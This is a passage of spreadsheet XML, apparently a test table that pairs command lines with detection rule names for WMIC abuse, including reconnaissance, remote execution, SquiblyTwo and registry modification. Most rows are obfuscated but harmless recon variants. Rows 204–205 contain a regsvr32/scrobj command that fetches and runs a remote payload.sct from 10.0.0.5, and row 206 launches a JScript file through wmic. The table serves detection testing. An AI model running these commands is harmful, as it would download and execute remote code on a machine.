      <c r="F177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H177" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I177" s="43" t="n"/>
      <c r="J177" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K177" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="178" ht="15.75" customHeight="1" s="42">
      <c r="A178" s="43" t="n"/>
      <c r="B178" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C178" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D178" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E178" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /"node:"localhost"" /namespace:\\root\\cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode -"format:csv"</t>
        </is>
      </c>
      <c r="F178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H178" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I178" s="43" t="n"/>
      <c r="J178" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K178" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="179" ht="15.75" customHeight="1" s="42">
      <c r="A179" s="43" t="n"/>
      <c r="B179" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C179" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D179" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E179" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nODe:"lOcalhosT" /nAMESpAcE:\\ROOt\\Cimv2 path Win32_Service get Name,DisplayName,PathName,StartMode /"format:csv"</t>
        </is>
      </c>
      <c r="F179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H179" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I179" s="43" t="n"/>
      <c r="J179" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K179" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="180" ht="15.75" customHeight="1" s="42">
      <c r="A180" s="43" t="n"/>
      <c r="B180" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_unquoted_service_search</t>
        </is>
      </c>
      <c r="C180" s="44" t="inlineStr">
        <is>
          <t>Potential Unquoted Service Path Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D180" s="44" t="inlineStr">
        <is>
          <t>68bcd73b-37ef-49cb-95fc-edc809730be6</t>
        </is>
      </c>
      <c r="E180" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /NOde:"LoCALhoST" /nAMesPace:\\rOot\\CImv2 path Win32_Service get Name,DisplayName,PathName,StartMode /fOrMAt:Csv</t>
        </is>
      </c>
      <c r="F180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H180" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I180" s="43" t="n"/>
      <c r="J180" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K180" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="181" ht="15.75" customHeight="1" s="42">
      <c r="A181" s="43" t="n"/>
      <c r="B181" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C181" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D181" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E181" s="44" t="inlineStr">
        <is>
          <t>wmic.exe fsdir where "drive='C:'" get name,filesize</t>
        </is>
      </c>
      <c r="F181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H181" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I181" s="43" t="n"/>
      <c r="J181" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K181" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="182" ht="15.75" customHeight="1" s="42">
      <c r="A182" s="43" t="n"/>
      <c r="B182" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C182" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D182" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E182" s="44" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk list brief</t>
        </is>
      </c>
      <c r="F182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H182" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I182" s="43" t="n"/>
      <c r="J182" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K182" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="183" ht="15.75" customHeight="1" s="42">
      <c r="A183" s="43" t="n"/>
      <c r="B183" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C183" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D183" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E183" s="44" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H183" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I183" s="43" t="n"/>
      <c r="J183" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K183" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="184" ht="15.75" customHeight="1" s="42">
      <c r="A184" s="43" t="n"/>
      <c r="B184" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C184" s="44" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D184" s="44" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E184" s="44" t="inlineStr">
        <is>
          <t>wmic.exe logicaldisk where "DriveType=3" get Name,Size,FreeSpace</t>
        </is>
      </c>
      <c r="F184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H184" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I184" s="43" t="n"/>
      <c r="J184" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K184" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="185" ht="15.75" customHeight="1" s="42">
      <c r="A185" s="43" t="n"/>
      <c r="B185" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C185" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D185" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E185" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-CimInstance -ClassName Win32_Process -CimSession 192.168.1.100"</t>
        </is>
      </c>
      <c r="F185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H185" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I185" s="43" t="n"/>
      <c r="J185" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K185" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="186" ht="15.75" customHeight="1" s="42">
      <c r="A186" s="43" t="n"/>
      <c r="B186" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C186" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D186" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E186" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /noDe:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H186" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I186" s="43" t="n"/>
      <c r="J186" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K186" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="187" ht="15.75" customHeight="1" s="42">
      <c r="A187" s="43" t="n"/>
      <c r="B187" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C187" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D187" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E187" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /nodE:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H187" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I187" s="43" t="n"/>
      <c r="J187" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K187" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="188" ht="15.75" customHeight="1" s="42">
      <c r="A188" s="43" t="n"/>
      <c r="B188" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C188" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D188" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E188" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /node:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H188" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I188" s="43" t="n"/>
      <c r="J188" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K188" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="189" ht="15.75" customHeight="1" s="42">
      <c r="A189" s="43" t="n"/>
      <c r="B189" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C189" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D189" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E189" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /NODE:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H189" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I189" s="43" t="n"/>
      <c r="J189" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K189" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="190" ht="15.75" customHeight="1" s="42">
      <c r="A190" s="43" t="n"/>
      <c r="B190" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C190" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D190" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E190" s="44" t="inlineStr">
        <is>
          <t>wmic.exe -"node:127.0.1" process list</t>
        </is>
      </c>
      <c r="F190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H190" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I190" s="43" t="n"/>
      <c r="J190" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K190" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="191" ht="15.75" customHeight="1" s="42">
      <c r="A191" s="43" t="n"/>
      <c r="B191" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C191" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D191" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E191" s="44" t="inlineStr">
        <is>
          <t>wmic.exe /"node:127.0.1" process list</t>
        </is>
      </c>
      <c r="F191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H191" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I191" s="43" t="n"/>
      <c r="J191" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K191" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="192" ht="15.75" customHeight="1" s="42">
      <c r="A192" s="43" t="n"/>
      <c r="B192" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C192" s="44" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D192" s="44" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E192" s="44" t="inlineStr">
        <is>
          <t>wmic.exe -"node:::1" process list</t>
        </is>
      </c>
      <c r="F192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H192" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I192" s="43" t="n"/>
      <c r="J192" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K192" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="193" ht="15.75" customHeight="1" s="42">
      <c r="A193" s="43" t="n"/>
      <c r="B193" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C193" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D193" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E193" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H193" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I193" s="43" t="n"/>
      <c r="J193" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K193" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="194" ht="15.75" customHeight="1" s="42">
      <c r="A194" s="43" t="n"/>
      <c r="B194" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C194" s="44" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D194" s="44" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E194" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H194" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I194" s="43" t="n"/>
      <c r="J194" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K194" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="195" ht="15.75" customHeight="1" s="42">
      <c r="A195" s="43" t="n"/>
      <c r="B195" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C195" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D195" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E195" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F195" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G195" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H195" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I195" s="44" t="n"/>
      <c r="J195" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K195" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="196" ht="15.75" customHeight="1" s="42">
      <c r="A196" s="43" t="n"/>
      <c r="B196" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C196" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D196" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E196" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F196" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G196" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H196" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I196" s="44" t="n"/>
      <c r="J196" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K196" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="197" ht="15.75" customHeight="1" s="42">
      <c r="A197" s="43" t="n"/>
      <c r="B197" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C197" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D197" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E197" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F197" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G197" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H197" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I197" s="44" t="n"/>
      <c r="J197" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K197" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="198" ht="15.75" customHeight="1" s="42">
      <c r="A198" s="43" t="n"/>
      <c r="B198" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C198" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D198" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E198" s="44" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F198" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G198" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H198" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I198" s="44" t="n"/>
      <c r="J198" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K198" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="199" ht="15.75" customHeight="1" s="42">
      <c r="A199" s="43" t="n"/>
      <c r="B199" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C199" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D199" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E199" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H199" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I199" s="43" t="n"/>
      <c r="J199" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K199" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="200" ht="15.75" customHeight="1" s="42">
      <c r="A200" s="43" t="n"/>
      <c r="B200" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C200" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D200" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E200" s="44" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H200" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I200" s="43" t="n"/>
      <c r="J200" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K200" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="201" ht="15.75" customHeight="1" s="42">
      <c r="A201" s="43" t="n"/>
      <c r="B201" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C201" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D201" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E201" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H201" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I201" s="44" t="n"/>
      <c r="J201" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K201" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="202" ht="15.75" customHeight="1" s="42">
      <c r="A202" s="43" t="n"/>
      <c r="B202" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C202" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D202" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E202" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F202" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G202" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H202" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I202" s="43" t="n"/>
      <c r="J202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K202" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="203" ht="15.75" customHeight="1" s="42">
      <c r="A203" s="43" t="n"/>
      <c r="B203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C203" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D203" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E203" s="44" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H203" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I203" s="43" t="n"/>
      <c r="J203" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K203" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="204" ht="15.75" customHeight="1" s="42">
      <c r="A204" s="43" t="n"/>
      <c r="B204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C204" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D204" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E204" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H204" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I204" s="43" t="n"/>
      <c r="J204" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K204" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="205" ht="15.75" customHeight="1" s="42">
      <c r="A205" s="43" t="n"/>
      <c r="B205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C205" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D205" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E205" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F205" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G205" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H205" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I205" s="43" t="n"/>
      <c r="J205" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K205" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="206" ht="15.75" customHeight="1" s="42">
      <c r="A206" s="43" t="n"/>
      <c r="B206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C206" s="44" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D206" s="44" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E206" s="44" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /c set __COMPAT_LAYER= &amp;&amp; wscript.exe //E:jscript //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F206" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G206" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H206" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I206" s="43" t="n"/>
      <c r="J206" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K206" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="207" ht="15.75" customHeight="1" s="42">
